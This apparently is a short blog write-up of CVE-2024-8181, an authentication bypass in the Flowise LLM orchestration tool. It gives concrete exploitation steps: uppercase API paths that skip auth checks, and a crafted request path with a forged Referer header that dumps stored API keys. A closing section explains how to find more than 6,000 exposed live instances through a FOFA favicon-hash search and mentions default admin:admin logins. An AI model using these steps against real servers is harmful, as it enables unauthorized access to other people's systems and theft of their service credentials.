Flowise is an open source low-code tool for developers to build customized LLM orchestration flow & AI agents.
Basically server doesn't checks requests to the uppercase endpoint /API/V1.
We just have to replace all ajax requests endpoints to its uppercase version, and we'll do this client side.
here's the javascript code taken from my gist
To use this, navigate to a page that does not require authentication (ex: /tools),
then inject this code inside dev tools console.
Congratulations! This will last until you reload manually the page.
Usually there are stored apikeys for various services.
[*] flowise_authbypass.png
CVE-2024-8181
"An Authentication Bypass vulnerability exists in Flowise version 1.8.2.
This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality."
-nvd.nist.gov
While reading this nuclei template i found out how to exploit the vulnerability,
So, testing with burpsuite i encountered the expected behavior to the /api/v1/apikey?/api/v1/ping URL path adding the Referer: [BASE URL]/document-stores header.
API keys. [*] flowise_apikeys.png
Looking for vulnerable targets
Its favicon hash is -2051052918, knowing this we just have to search it on FOFA,
giving to us more than 6k results.
[*] fofa_results.png
By the way, most of these results are even without login or with admin:admin bruh, this is because AI is a hot topic these last years,
so unexperienced people and companies will find a way to use an LLM for anything, inappropriate or not.
